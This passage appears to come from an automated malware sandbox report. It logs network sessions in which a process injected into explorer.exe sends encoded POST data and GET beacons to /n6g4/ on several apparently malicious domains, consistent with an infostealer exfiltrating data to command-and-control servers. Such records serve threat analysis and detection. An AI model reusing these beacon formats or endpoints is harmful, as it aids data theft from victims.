4v3-U-hpuF6ZZ9bjv_cz(DuiPbGZrFhEf_0HBefHVEXVe1m1b8XoZPbi(q13mhwOBp4_FDJXetFwD7Xm~K72wSpf75LBJkRFzdbhTqsH0XFBsEFfl_fx6-aCL6OKfaJj(h6aTh4pQK3BSxx4zZjwp9Cb2bjWXltcVYG5LAzDBZK3QEE_BW3tumYPtM9LFsa2d6uXfnpapKlrwVdGNMqM9ZS_F6e6EgdKYzWKwPgq0Eb810czN8XzLLCOK0Payt1NhA5LnMeTiUEqbm7-nKUlQ63rl-QAU_7IOkaYW944dI3X1BMZBfUzUFgyqZNTCcDbg6BnWaOAr38OFFPDLSut7hhYRT8HVh4OYeJmg88yHO9k~0fMsNn7IK9uXql7FKG2pEs0fvrd0ObjJqhDHipZoXK9vOfqlAoopZmj3C7pmBI0CnJLRKP0FbSqTfzz9Q6V7ZYBli04EvpE~3FRYj8rslbXG-WFtToXq6gHJNTFno0qx-enSa17iS3-tmHaEIA4M8muRmSnyIkhc0iLEhWt0MCNxdYPlk6WFKheMsa7RwXxEkfpMaePcWHBSQVk~OD5skEfiCmdw_0tMx25vhIFcnYj3hgniAlPZxsWWXkP3MTmwxjNI_isKMxMobcbLqeKxqvgbP31vnB6J8ZNROqJxf44b93zoucftN5pxH3IS2TqMVQrNBoUF1bu91m65y9rCetKbqoF2FSFcGYeubUDv52J3zJ07oZicvySB2LqvjFvPiyNg_fuV_l2YBIL5N9CDpB5p5TqptD1ySOk~gN3F_WnypoPbj0gF9p2(AeLilx4u8GZHYy9dN8Vsg9PTpla~T6wHIrJfoeoXlvKdaZvmP7qoZCWaJ8ZEzrlU4VcQERbOzQn7sylOuo9ljUSwYh7Lvp0AgmCaZ4BYJ2Uwa1kHLRwsIMkIejuuMeVQyPcsxg3OLimMmMpoPt3DEXHR-Rm~adNETgtaqyQI5~QUyiRWeKk004XSwKvCabyhXM1zw8faff6QYOon0nuUWA0whzEF6ecrWP7oS8EvCuHIRqbd_dNjmd-CB4PxcxkWxAXTgfMUxHk~eGlZPxQ
May 14, 2022 15:30:16.773549080 CEST	7621	OUT	Data Raw: 59 67 71 56 63 28 71 44 66 4b 62 55 57 36 4e 52 6f 33 30 74 48 48 48 32 4f 64 71 75 64 73 70 78 6c 58 7a 58 34 58 63 71 7a 67 51 43 52 48 39 78 5a 4b 32 4b 33 41 65 4e 79 30 6a 67 76 58 54 51 48 36 63 45 62 33 79 42 73 45 50 30 52 39 57 77 62 51 Data Ascii: YgqVc(qDfKbUW6NRo30tHHH2OdqudspxlXzX4XcqzgQCRH9xZK2K3AeNy0jgvXTQH6cEb3yBsEP0R9WwbQvaJtsli6uIHEYOdTiPnMhspQZ(0Atwl00BbAEiUd3UyxUK0ToOsom27nk19EfSLVgCHSRqwOAkN6Mwd1jhweasy~GZl8TAEWmLxBKxZfR03YnuW4WiqxG47j7Iu3nt_s50Byqeg5U90Dp7onzsCPSWFfxeSLBw8HV
May 14, 2022 15:30:16.773643017 CEST	7623	OUT	Data Raw: 37 59 42 55 4c 34 4b 73 37 41 6c 56 5a 67 52 73 42 6d 5a 7a 54 56 4c 78 4c 77 53 58 4f 64 68 67 6e 5a 45 77 4e 56 64 70 4a 4d 61 67 41 4d 58 55 4b 43 61 39 66 63 4b 47 4e 66 70 38 45 50 55 41 33 38 67 30 7a 6c 76 35 64 7e 4c 47 34 42 42 54 50 6d Data Ascii: 7YBUL4Ks7AlVZgRsBmZzTVLxLwSXOdhgnZEwNVdpJMagAMXUKCa9fcKGNfp8EPUA38g0zlv5d~LG4BBTPmHpkn1etWCy80A0fJ-sgV8RbJPFzUjbINuj6l2IdHRsPmMX0~jqrcr3C3jCxf54gglMBhkDyyYgzQhbEf7WWvbXl5YBM8_UH4WyWZyDjBZkMn4GvTm8C~DwCPEW8UC9t~M~Y(b4SngXfP69Q~Kou8Ia8JYyZgCzsYc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49776	35.209.127.155	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:16.775228024 CEST	7624	OUT	GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1 Host: www.jamesreadtanusa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49778	198.54.117.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:22.546966076 CEST	9210	OUT	POST /n6g4/ HTTP/1.1 Host: www.kickball.site Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.kickball.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.kickball.site/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 5a 4e 45 5a 34 68 33 30 28 71 39 44 6e 45 76 73 72 5a 49 6e 36 41 6b 32 52 32 42 6e 4c 49 58 75 79 44 6f 78 4b 39 65 5f 67 73 78 61 49 79 58 35 58 51 65 5a 78 6f 48 66 53 49 56 46 4e 38 66 38 65 6c 57 59 74 6c 44 44 69 38 54 41 76 35 32 35 47 65 48 68 62 38 68 63 59 49 4b 72 44 35 6e 4d 32 6a 48 30 50 54 56 42 78 59 32 73 53 55 50 68 52 67 35 44 68 66 42 50 55 61 78 5a 67 31 78 5f 6c 79 37 78 7e 57 34 76 6d 52 59 5f 79 55 45 64 6a 6d 4b 63 45 46 43 6e 77 37 6d 55 71 7a 6b 6a 58 64 4c 6a 53 48 59 36 4c 61 4a 4b 4a 71 74 75 64 4d 32 77 44 64 41 34 37 33 28 54 51 62 34 43 36 4f 59 6c 35 64 46 78 65 76 4f 77 6a 71 69 33 33 32 6e 49 63 48 58 64 58 5f 49 51 6f 49 42 63 72 31 70 5f 73 73 61 47 52 4d 58 55 48 69 66 61 70 65 33 45 35 38 57 4f 6d 59 45 33 44 72 6f 57 4a 30 77 74 67 5f 64 64 54 4d 4d 41 57 69 61 7a 45 37 4d 58 37 53 77 74 48 68 71 6b 38 31 55 4b 4a 44 76 66 4e 33 47 49 46 75 4a 6e 6b 41 44 39 4a 56 76 75 4a 5f 48 45 6f 6b 47 64 69 61 54 45 28 7a 33 32 6f 75 54 54 69 66 66 44 6f 72 67 75 74 59 44 36 56 37 4d 61 4d 4c 54 44 30 53 39 76 69 4a 38 57 45 38 56 33 58 52 4f 5a 41 67 71 31 61 71 4e 44 45 44 76 32 62 72 38 44 47 43 6a 6f 62 33 57 6e 79 6d 4a 42 6f 71 6a 58 46 4e 78 47 76 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=ZNEZ4h30(q9DnEvsrZIn6Ak2R2BnLIXuyDoxK9e_gsxaIyX5XQeZxoHfSIVFN8f8elWYtlDDi8TAv525GeHhb8hcYIKrD5nM2jH0PTVBxY2sSUPhRg5DhfBPUaxZg1x_ly7x~W4vmRY_yUEdjmKcEFCnw7mUqzkjXdLjSHY6LaJKJqtudM2wDdA473(TQb4C6OYl5dFxevOwjqi332nIcHXdX_IQoIBcr1p_ssaGRMXUHifape3E58WOmYE3DroWJ0wtg_ddTMMAWiazE7MX7SwtHhqk81UKJDvfN3GIFuJnkAD9JVvuJ_HEokGdiaTE(z32ouTTiffDorgutYD6V7MaMLTD0S9viJ8WE8V3XROZAgq1aqNDEDv2br8DGCjob3WnymJBoqjXFNxGvw).
May 14, 2022 15:30:22.719718933 CEST	9210	IN	HTTP/1.1 405 Not Allowed Date: Sat, 14 May 2022 13:30:22 GMT Content-Type: text/html Content-Length: 154 Connection: close Server: namecheap-nginx Allow: GET, HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49779	198.54.117.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:22.721510887 CEST	9224	OUT	POST /n6g4/ HTTP/1.1 Host: www.kickball.site Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.kickball.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.kickball.site/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 5a 4e 45 5a 34 6a 7a 59 79 37 51 44 72 30 69 43 71 4d 73 7a 77 51 30 30 58 47 4e 69 53 70 4c 31 31 79 34 62 58 73 75 43 75 4f 78 45 5a 32 7a 55 54 58 54 4b 78 71 76 6d 59 71 68 42 48 38 62 5f 65 68 79 6d 74 6c 48 44 6a 39 36 4c 75 65 53 66 46 39 76 69 63 63 68 4b 4b 49 4b 75 48 34 36 71 32 6a 44 47 50 54 64 76 78 74 71 73 53 33 6e 68 54 6e 46 2d 76 66 42 4e 49 4c 42 7a 6b 31 73 41 6c 79 6a 58 7e 54 51 76 6e 68 63 5f 7a 33 4d 65 68 68 7e 62 63 46 43 75 7a 4c 6d 33 68 54 6f 33 58 64 48 4e 53 47 6b 36 4c 50 52 4b 4c 36 4e 75 66 37 69 7a 61 39 41 78 77 58 28 55 55 62 31 4d 36 4f 45 70 35 5a 31 4c 65 64 53 77 6a 61 69 32 68 48 76 41 59 51 36 46 56 38 55 33 6f 49 4e 31 72 67 77 71 73 75 66 54 57 39 6e 5a 4d 6b 71 4e 70 64 62 36 30 38 57 56 74 34 46 72 44 72 6f 63 4a 30 78 4f 67 2d 4e 64 54 50 73 41 57 42 79 7a 4d 37 4d 51 75 53 77 52 4c 42 72 32 34 77 4d 30 4a 44 33 6c 4e 32 7e 59 46 61 31 6e 72 77 7a 39 65 43 37 70 51 76 48 47 73 6b 47 38 6f 36 54 42 28 7a 33 55 6f 71 47 55 6a 6f 48 44 70 36 67 75 39 4c 6e 36 58 4c 4d 61 51 37 54 37 28 79 67 79 69 49 59 53 45 39 6b 49 58 69 69 5a 44 31 7e 31 61 4c 4e 44 49 54 76 32 54 4c 39 45 4c 68 61 46 59 6c 43 76 7e 6d 45 71 68 75 43 7a 4e 64 68 4f 31 45 56 42 78 77 33 4b 36 4b 4f 34 48 54 55 33 79 44 4d 41 42 53 64 76 62 37 58 70 6e 57 7a 59 57 4d 39 38 6c 71 52 48 35 6f 4f 7a 31 42 67 2d 53 70 43 54 79 58 28 62 49 41 6c 41 7a 6d 52 75 43 51 39 74 39 41 4a 2d 73 6a 76 58 4f 4d 7e 7a 4d 34 42 6b 6e 7a 4b 7a 49 69 55 32 6b 72 30 5a 6c 6a 73 70 68 72 49 45 79 44 56 45 59 32 73 46 73 35 6e 58 6f 68 54 45 78 73 50 61 75 42 6e 70 77 5f 35 52 72 33 33 64 70 4e 34 69 42 78 39 32 4d 4f 64 43 63 67 47 42 52 4b 62 70 6c 52 41 32 46 6c 52 71 71 6f 72 51 67 72 53 51 4c 62 4c 46 70 76 69 46 34 52 76 41 76 4d 59 33 4d 4d 73 76 48 53 74 41 39 49 77 4f 6b 43 56 41 34 56 64 66 61 59 31 41 6b 4d 43 49 4d 46 4c 78 51 51 64 6a 57 67 59 58 4a 43 42 73 70 66 79 6d 53 37 47 4a 47 71 36 45 57 6f 6e 59 4e 78 44 32 76 66 41 54 6f 32 56 63 38 48 49 54 37 67 4b 2d 43 56 52 69 41 4a 75 6f 56 7a 33 62 68 37 65 55 72 37 75 76 37 66 59 43 32 47 6d 66 78 6e 5a 2d 4f 5a 77 65 7e 70 47 33 39 71 4a 70 43 5f 49 44 4d 46 4a 41 46 48 33 79 58 74 68 64 7a 7a 6c 41 35 4f 68 76 58 4f 72 74 6d 4e 6d 65 78 56 28 41 55 39 58 38 46 31 34 6e 52 33 4d 57 4a 4a 48 43 67 4c 4f 75 7e 78 4e 50 6d 4e 5a 68 6e 73 54 36 6a 55 74 6f 75 46 67 5f 7a 4a 4f 5f 61 4c 39 38 72 70 66 4a 65 72 66 2d 4e 48 6a 50 4b 75 4a 46 67 75 32 65 53 65 37 6b 33 4e 4b 4b 6a 4c 69 4e 46 35 42 6f 6a 38 54 43 4f 61 33 4f 44 51 64 70 4c 69 38 5a 7e 5f 37 44 63 79 57 36 48 52 35 74 6e 79 56 5f 71 58 35 45 66 71 6f 77 47 6e 65 43 72 56 75 50 48 44 71 62 76 4e 70 63 56 34 6d 5a 78 45 76 43 38 34 75 42 67 52 30 51 76 7a 59 34 4e 35 50 4a 37 2d 4a 32 50 77 31 5f 30 7a 72 65 57 66 33 43 54 38 62 78 69 44 66 74 59 52 45 67 57 61 43 58 31 49 72 61 63 44 6e 71 76 78 6e 30 33 62 69 50 67 69 59 64 49 6b 55 68 68 77 63 53 59 72 6b 52 5a 55 5a 42 65 34 74 4d 44 67 36 51 57 64 71 2d 74 44 54 35 68 4c 31 6f 77 4a 39 35 56 43 6c 48 59 70 30 69 72 59 41 30 55 48 79 59 65 31 34 49 42 71 4b 49 51 35 6f 69 73 4f 6b 70 65 38 77 4b 57 77 57 47 6a 54 55 50 71 75 6e 4e 65 5f 74 4e 4c 43 45 63 42 64 44 57 48 37 57 52 4a 50 32 76 65 38 58 6b 74 72 53 6b 72 6f 4e 45 30 68 39 66 53 73 69 36 75 35 32 58 76 47 52 53 34 57 30 4c 6a 5f 44 61 65 56 49 5a 51 54 61 4b 71 72 6a 36 4b 31 4c 52 33 4e 61 5f 6e 4e 52 42 63 56 69 4f 72 50 30 55 70 6f 45 37 38 44 66 70 28 72 58 42 4d 43 4e 5a 7a 38 74 66 51 2d 6a 64 70 39 46 63 72 46 66 57 58 36 72 34 33 30 61 65 52 32 67 4b 6f 65 45 66 47 4f 6c 59 5a 61 4c 4b 63 38 6d 30 67 4c 59 75 51 70 65 72 65 4d 45 36 37 4d 75 36 72 4f 49 63 7a 30 53 54 4a 4c 54 2d 48 45 72 67 66 4a 66 62 44 45 71 4c 7a 71 31 44 50 46 34 65 34 68 74 30 36 63 75 49 51 67 69 74 4a 44 47 74 33 49 65 71 65 65 55 43 76 41 34 77 44 54 75 63 53 76 66 36 36 4e 34 54 67 48 4c 43 59 79 6a 49 49 71 31 54 74 4f 7a 6c 37 7a 7e 72 6b 30 30 42 6b 30 28 4f 6e 4b 59 4f 41 59 48 72 4c 4a 33 4c 4d 54 30 39 39 48 68 66 52 63 4f 46 6f 64 69 61 6c 6b 35 59 44 36 57 31 42 43 48 78 53 34 66 Data Ascii: 3fe=ZNEZ4jzYy7QDr0iCqMszwQ00XGNiSpL11y4bXsuCuOxEZ2zUTXTKxqvmYqhBH8b_ehymtlHDj96LueSfF9vicchKKIKuH46q2jDGPTdvxtqsS3nhTnF-vfBNILBzk1sAlyjX~TQvnhc_z3Mehh~bcFCuzLm3hTo3XdHNSGk6LPRKL6Nuf7iza9AxwX(UUb1M6OEp5Z1LedSwjai2hHvAYQ6FV8U3oIN1rgwqsufTW9nZMkqNpdb608WVt4FrDrocJ0xOg-NdTPsAWByzM7MQuSwRLBr24wM0JD3lN2~YFa1nrwz9eC7pQvHGskG8o6TB(z3UoqGUjoHDp6gu9Ln6XLMaQ7T7(ygyiIYSE9kIXiiZD1~1aLNDITv2TL9ELhaFYlCv~mEqhuCzNdhO1EVBxw3K6KO4HTU3yDMABSdvb7XpnWzYWM98lqRH5oOz1Bg-SpCTyX(bIAlAzmRuCQ9t9AJ-sjvXOM~zM4BknzKzIiU2kr0ZljsphrIEyDVEY2sFs5nXohTExsPauBnpw_5Rr33dpN4iBx92MOdCcgGBRKbplRA2FlRqqorQgrSQLbLFpviF4RvAvMY3MMsvHStA9IwOkCVA4VdfaY1AkMCIMFLxQQdjWgYXJCBspfymS7GJGq6EWonYNxD2vfATo2Vc8HIT7gK-CVRiAJuoVz3bh7eUr7uv7fYC2GmfxnZ-OZwe~pG39qJpC_IDMFJAFH3yXthdzzlA5OhvXOrtmNmexV(AU9X8F14nR3MWJJHCgLOu~xNPmNZhnsT6jUtouFg_zJO_aL98rpfJerf-NHjPKuJFgu2eSe7k3NKKjLiNF5Boj8TCOa3ODQdpLi8Z~_7DcyW6HR5tnyV_qX5EfqowGneCrVuPHDqbvNpcV4mZxEvC84uBgR0QvzY4N5PJ7-J2Pw1_0zreWf3CT8bxiDftYREgWaCX1IracDnqvxn03biPgiYdIkUhhwcSYrkRZUZBe4tMDg6QWdq-tDT5hL1owJ95VClHYp0irYA0UHyYe14IBqKIQ5oisOkpe8wKWwWGjTUPqunNe_tNLCEcBdDWH7WRJP2ve8XktrSkroNE0h9fSsi6u52XvGRS4W0Lj_DaeVIZQTaKqrj6K1LR3Na_nNRBcViOrP0UpoE78Dfp(rXBMCNZz8tfQ-jdp9FcrFfWX6r430aeR2gKoeEfGOlYZaLKc8m0gLYuQpereME67Mu6rOIcz0STJLT-HErgfJfbDEqLzq1DPF4e4ht06cuIQgitJDGt3IeqeeUCvA4wDTucSvf66N4TgHLCYyjIIq1TtOzl7z~rk00Bk0(OnKYOAYHrLJ3LMT099HhfRcOFodialk5YD6W1BCHxS4fGI8oh4kKbsR5ezM5_KHUAmltbCX7hOy9D0e6noA53iERvbjEMYqnDjjnYjHn6(XgLw62lLcWplKOqVv02U1c30sGUIy23pznTf94myMAiY7coTlgCAUMb5CdfwFJsKm2affEXQSs-ZKMe1QX-HDDNXStpkiKKfQJ9GVr6db6wy6WuYsLOIG5dpgqn(4W07hPKdpPdR9lXdCn0oYHBh3cxyY(_zUFv75Id16ScbcfnobaqrVgN5MYenQt25YJGKJJNNAz1v-Ay5hIHf25tJaD6qEJKBTJDV5E78_egg9xRm3DMTsboatfc8yyqOL7z~nxLVh1EM3l8EChw6W7ClYcBFyqlnVmGPBNjW_VJO2HLK4hWRUYRQkzBfJIm8DfVI-P3RiDTI4Y_a4aFu5NHs-D7r2YbFOUY9xphLjMwjO6tfnJJtwPFwuL_fe(GnclnZ6CrUtDntMtT~8nJS2d677(5XSUAKojLkUwBgRTynjcx(xuSouNY4Q5IOn9vSLrTAqPRWbGxKrrvJtM3iCtcKyj3TRUP7K~3fabKSWjMeHA2eHCpfsvpyn8gcxbzIjQtfV30SpbErhcYNiPJobmJ3nkg8CtghAals3BEjIjA6i3-~3rKphygnTOztWymjUKt(c9wwGEyNOnTmgIT9zoYbfj60uMeJamKsY4Qakw1ZEfKEmD7lwtCYzq3Z4X-Gfs2okRgArlHez51xHV50AjQl777bamJ9K3EAJKGkeTb3C1VJR~z1ufcsAUvrK8PsSwEvIQpwxt8AbpPE0MtcgAF1H0ie_oZ8jOfCrqBjqaeaWoyKIjkd-uhFEK4LldFCIeumQWTjIRNj2kwJ3(dTqdK3yEEjXvPJhKznYmhpNjvSucfmr0yEYYZWXCPzJgvTCpe76pnOLnf0Q8QJcIlZuZ5SC7KOUuNCAH-HGKOV_Bg0eOQ9T8YHAmHMKKufYN_0C9D1tXbsMYxnXHi2m6KfjNYGW8gGR3S2H2Zy6XBKoRSu-XwGMKM8MWkbLmhL5ps(cc4eeDlJYF_q-cdlstIDpS_wJHoiOvjSlPd0Kl4kiOY0vamuMJ2J6qHYOh7ipRbeAjiHba2IFBBqvgmT8Fg5Pubb3kl3_d144~GZ5irKMe7x-S-yDKrJziOJ5cbF96GD4r9BJ9jlQDoil8wMjV5Rw5I49BhKGK9qqCvrPYgkykPi4Mou_4zG-fJtOcs(u~4Cl~av20cxGLCcGpDBJ84W4zMXy0EBkRsZJW_GBTZAjWnUh4MnbOVcStpab~MIGY6ADVoRL0fI1JWAfxcb4JYXXUjPlybf_v7fRuWxOahrH2oF4d5tLzwhJcaHj3PYk1Q8u9sdgsd7iNsnl7yUYRP3N2PDUr_vl0kFVH5HeN-(JB6KPbeeTSdLYqa3DKxNU626uVJO2f7YMmGfnkj(akpadBxASdaQatERHUnD7ZnK5vBN6ERmCE3SGUiSMBBbjB0A5wi~uPWoumr(6txI1GBvWLCQfM92V99gpREHbHblDdOyyL5y1MvC07qQF9wJuHZyBY88lnyFIyo7fYpAo0R4tdR0CbK0qu_Wr5f6tm5c5xRkfYHRH(c5immu7q32_SodNvAlykrOEPTpeXm76TK5ElT0PG2BSZksNqKYvIgDCGaiqKz0k(FlRsyJo0J6QtEW07IgqIb6F2-PMCO9WWSmhRng_OOwUY6fe1MeN4PWhE4uQz5Sjrs9hHS4WRIAv0C4nIJghl9d6uByBlPtFqb54BgOam_(5rdC4xFdGZx~sTcrFlYs88LhsCP5tsfup6BjHWdY_uO9Yoff2IDVLk9quCwaIe4Tg5lvddr83bQp_X4jnVuAN28b35vNd8i74m4U_5zdsgkQTSAOGYkYM3-ja(nzkYcEQt0Cmow7bMC0bV55nL5YS(fRI4YevTOfV(8jo(kx2eRP-SSOVQ2XUSVwo(JXGF4E_XRwRiUiDL9NKAJVoB58b9DqdJ7OyIV8VuErbtLqlXQtVupyaZbN89AEG(ZQu6GdellpsyuueGJScYjnhkHgldaL2RjaA(mM-H9Z5BeDLL2(s1T7XNqAjYEtCAcBwrYmJWs2D90ckpGH1u59ZkzxG43QVk-MtMVyspkOl5-fbV3SpLTcBfa66JZZvL8zKwv80~0Xq8XlvhXIxMlBrhhPor5vLHgEiy2ocLGT6cwQ0JJDIAFgy5f2lA9292uPytl(z2oGIx3aigU(s3I5BWwzXoqeOXEoyMKSZ7uj2Qob6D2VH2x75mwN1Eb7nxMAFYh2B0fzfO2KqNaHLqQXVLAHkxGebWKHAJZSBXImlDfL1FszsOrHXbW4XYm8duLA2h00biU5usIUdDJ~-M0cVGbEEAZzFUpHyp-JBsb4tqNMa~gO9NRJsUnTczp~cT38EOZuwXoq85Dv3VUgvVFNeu7gpSjke(lM82vwAHpUru_bXUY6xT1JEdzxTQ-0Jvv1Kz9efXbJSEbLtMDfO(vDriebwRELn2GdSZqBNoxY3P85I6m5kOqUjETW6mpRjwvrCI9AjXg0OKRYPtMF_NKGpIOEa82Cjuodpn5cWSejCRiFupc3ozyroiHNm3DbWEFcyphrLdxGToQmaQM0Nd7BBSL6uVoF2jkUvMTCBtLtqal~fdRuAqWJ9~VBZEI6Uqk9Y2qAy32hP0hurt9WnV6ZPww5Bt8BSCRyNc1FqxNGMlRUevVgFm_(t6dBIqrBpgkFKQpmjfP1IST0MZTtJ
May 14, 2022 15:30:22.894263029 CEST	9224	IN	HTTP/1.1 405 Not Allowed Date: Sat, 14 May 2022 13:30:22 GMT Content-Type: text/html Content-Length: 154 Connection: close Server: namecheap-nginx Allow: GET, HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
May 14, 2022 15:30:22.894321918 CEST	9232	OUT	Data Raw: 43 72 35 32 6c 48 75 32 5f 63 76 4c 52 7a 49 35 33 30 49 54 54 32 51 43 51 39 65 68 4c 66 4d 75 43 64 47 41 32 37 49 31 43 57 75 51 57 75 43 30 4f 68 71 43 6b 42 51 31 79 54 7a 32 73 4a 58 7a 76 30 4e 4e 61 4f 37 51 53 54 64 54 66 53 6c 47 30 39 Data Ascii: Cr52lHu2_cvLRzI530ITT2QCQ9ehLfMuCdGA27I1CWuQWuC0OhqCkBQ1yTz2sJXzv0NNaO7QSTdTfSlG098gkKj4yutTKRObU5XNEguDuPQKfcvqNNvCjgoIkEDaYMpNWxmvjQ5AY72OJKagusbMLnZ8LzSeufI5dk7Ut19Q6RzMj4L9W9-rbnd8VHKIhp5MmfkdmbrEmmd71UUZheVQ-2VaO(nrxHTjImYWi9TauZKcmDa47tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49780	198.54.117.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:22.895159960 CEST	9233	OUT	GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1 Host: www.kickball.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49781	35.241.47.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:28.487941027 CEST	9234	OUT	POST /n6g4/ HTTP/1.1 Host: www.bldh45.xyz Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.bldh45.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bldh45.xyz/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 52 70 4c 67 49 62 6c 5f 30 63 7e 41 70 57 36 7a 77 43 37 73 6e 64 69 62 74 4c 7e 42 6d 38 77 36 4d 76 48 76 67 79 33 58 4f 6c 39 54 50 49 38 45 63 34 50 74 4e 68 53 44 74 5f 7a 44 28 38 4e 79 30 31 42 56 65 30 39 63 44 35 50 51 73 38 53 55 6c 51 51 70 76 54 5a 46 59 55 45 4e 71 53 54 56 38 42 30 4d 57 47 35 47 65 53 6f 49 73 70 4a 58 72 50 33 41 79 48 72 68 77 71 6e 5f 50 6b 48 74 6a 64 79 79 43 69 42 5a 44 54 33 46 59 42 62 68 6d 6e 72 69 30 52 38 58 38 59 71 37 78 34 39 64 59 54 65 71 68 66 69 4a 70 6c 63 49 53 2d 70 4a 4e 32 75 65 74 47 65 4c 32 4d 62 76 62 53 72 5f 7a 6b 68 46 74 61 76 50 50 46 28 6f 77 52 77 6d 4c 47 74 4f 7e 7a 63 67 46 44 36 59 4e 4a 77 55 77 6a 62 6b 4d 4b 76 70 30 6b 41 54 6b 69 36 5f 6f 7a 66 67 6e 52 42 79 79 49 78 6f 6b 32 76 79 30 31 37 55 6d 6f 77 73 5a 71 37 51 42 54 4a 4f 35 70 42 4c 6f 49 6b 53 46 74 77 66 37 66 52 67 57 63 46 6e 65 58 56 45 72 66 61 4a 68 39 63 41 53 43 78 42 79 4e 62 45 43 32 58 44 69 77 66 67 49 59 7a 6e 33 44 43 36 6c 6a 41 46 79 4c 57 39 70 51 64 41 73 63 71 6b 7a 31 59 31 55 30 47 4d 4d 33 72 33 39 77 75 55 36 71 76 64 59 79 69 6d 71 5f 6e 68 69 33 49 6b 7e 48 7e 70 37 75 62 42 36 45 31 55 69 5a 6e 73 47 77 73 79 28 37 7a 35 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=RpLgIbl_0c~ApW6zwC7sndibtL~Bm8w6MvHvgy3XOl9TPI8Ec4PtNhSDt_zD(8Ny01BVe09cD5PQs8SUlQQpvTZFYUENqSTV8B0MWG5GeSoIspJXrP3AyHrhwqn_PkHtjdyyCiBZDT3FYBbhmnri0R8X8Yq7x49dYTeqhfiJplcIS-pJN2uetGeL2MbvbSr_zkhFtavPPF(owRwmLGtO~zcgFD6YNJwUwjbkMKvp0kATki6_ozfgnRByyIxok2vy017UmowsZq7QBTJO5pBLoIkSFtwf7fRgWcFneXVErfaJh9cASCxByNbEC2XDiwfgIYzn3DC6ljAFyLW9pQdAscqkz1Y1U0GMM3r39wuU6qvdYyimq_nhi3Ik~H~p7ubB6E1UiZnsGwsy(7z5iA).
